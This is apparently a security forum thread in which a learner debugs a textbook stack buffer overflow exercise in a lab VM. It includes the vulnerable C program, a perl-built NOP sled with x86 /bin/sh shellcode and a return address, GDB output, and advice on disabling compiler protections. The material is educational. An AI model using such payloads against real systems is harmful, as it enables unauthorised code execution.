Buffer Overflows and Nop Sled

[digitalvampire]

Hey Guys,
(Not sure if this is a double post, I sent one in a few mins ago but it didn't seem to take)

I've been playing around with Buffer Overflows this week, and I seem to be running into a strange issue.  I am going to try my best to explain it.

I've been working with the examples in "The Art of Exploitation" The first one is vuln.c and here is the code:

Code:

int main(int argc, char *argv[])
{
   char buffer[500];
   strcpy(buffer, argv[1]);
   return 0;
}

I compiled the program with the -fno-stack-protector and the -mpreferred-stack-boundary=2 and I've also made sure ASLR is off (running Ubuntu 12.10 in a vm)

I've been calculating my return address from subtracting about 400 from the ESP value after the buffer has been added onto the stack.  I figured this is where the nop sled should be.  I have actually gotten it to the point where it will segfault and print out that address that I was throwing at it, but I guess I'm curious why if EIP has that address it's not launching the sled and sliding down to my shellcode?  I'm aware of the divisible by 4 rule, and I'm pretty sure I have that in place too..

Here is the GDB session with the info I'm throwing at it:

Code:

Starting program: /root/aeh/bof/vulnerableapp `perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`

Breakpoint 1, main (argc=2, argv=0xbffff604) at vul.c:8
8               strcpy(buffer, argv[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff18a in ?? ()

Any ideas on how to attack this next?  I'd really like to learn this, its rather exciting

Thanks in advance for all your help!

Sincerely,

-DV

[ajohnson]

I'd try to find out what your exact offset is through a cyclic pattern (i.e. pattern_create.rb) or a binary tree analysis. I wouldn't just ballpark approximate values.

What address are you submitting to EIP? It should be something like a jmp esp address, not an address somewhere in your NOP sled.

It's kind of difficult to troubleshoot your issue without the register values, stack contents, full exploit, etc.

[digitalvampire]

Thanks, that actually helps a lot..!

Is there a way through gdb I can dump the full contents of the stack ?

I've actually been trying to exploit it via command line for now using:

Code:

`perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`

I was submitting this address for the EIP: 0xbffff18a

Except I submitted it via Little Endian style.

I thought if I pointed it to an address in the Nop Sled, it would slide down to the code?  

Thanks again!!

*Edit:

After getting a whole bunch of strewn test files everywhere, I started clean, but still with the same issue.  Here is a dump of the EIP after the seg fault..

Code:

Program received signal SIGSEGV, Segmentation fault.
0xbffff4a4 in ?? ()
(gdb) x/20x $eip
0xbffff4a4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4b4:     0x31909090      0x01ec83c0      0x68240488      0x68736162
0xbffff4c4:     0x6e696268      0x01ec832f      0x2f2404c6      0x5650e689
0xbffff4d4:     0xf3890bb0      0xd231e189      0x01b080cd      0x80cddb31
0xbffff4e4:     0xbffff4a4      0xbffff4a4      0xbffff4a4      0xbffff4a4
(gdb)

The repeated return address entered was: 0xbffff4a4 which looks almost successful as the segfault is giving me that as its value for EIP.  Why is it stopping here?  I have ideas but they are somewhat mangled

Thanks!!

[superkojiman]

I was able to exploit the example on Ubuntu 10.04, but only by compiling it with -z execstack. That is:

gcc -fno-stack-protector -mpreferred-stack-boundary=2 -ggdb -o vuln -z execstack vuln.c

The book comes with a live CD that should turn off (or not include) certain security features that would prevent the exploits from working. I would suggest using that while going through the exploit examples.

Some references that might be helpful if you do choose to use a more current Linux distribution:

https://www.soldierx.com/tutorials/Stack-Smashing-Modern-Linux-System
http://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/

[ajohnson]

+1 to just using the accompanying CD: http://nostarch.com/hackingCD.htm

That'll remove a lot of the weird variables that may unexpectedly crop up on more recent Linux distros (i.e. default GCC protections).

The book doesn't address them, so not going through it as intended will result in unnecessary headaches. Superkojiman provided good resources for further study.

[H1t M0nk3y]

You can also take a look at some very good and free video tutorials from securitytube.net.

Buffer Overflow Exploitation Megaprimer for Linux: http://www.securitytube.net/groups?operation=view&groupId=4

Good luck!

[digitalvampire]

Thanks guys!   I too figured out that there was something weird going on.. and switched to using DVL to compile which seemed to work.  I did not know about that extra switch for gcc though, I'm going to try it on my Ubuntu machine.

I have the original book, 1st edition which doesn't have the CD - but I think with that extra compile parameter it should work better.. and if not I can keep compiling in DVL. 

The SecurityTube videos are great, I went through those recently and always look forward to him adding more.., I have been meaning to try the Python series when I get a chance. (I'm a python fanatic..)

Thanks again guys!!

-DV

[hayabusa]

The Python series is great, too.  You'll enjoy it.

[superkojiman]

I have the original book, 1st edition which doesn't have the CD - but I think with that extra compile parameter it should work better.. and if not I can keep compiling in DVL. 

The link ajohnson provided has a link that allows you to download the ISO in case the CD that came with the book is broken (or in your case, not included). Here's the direct link to the ISO: http://www.mininova.org/tor/2533556

[digitalvampire]

Thanks again!   I will definitely get that CD, especially since it was designed specifically for the exercises in the book.

Thanks !!

-DV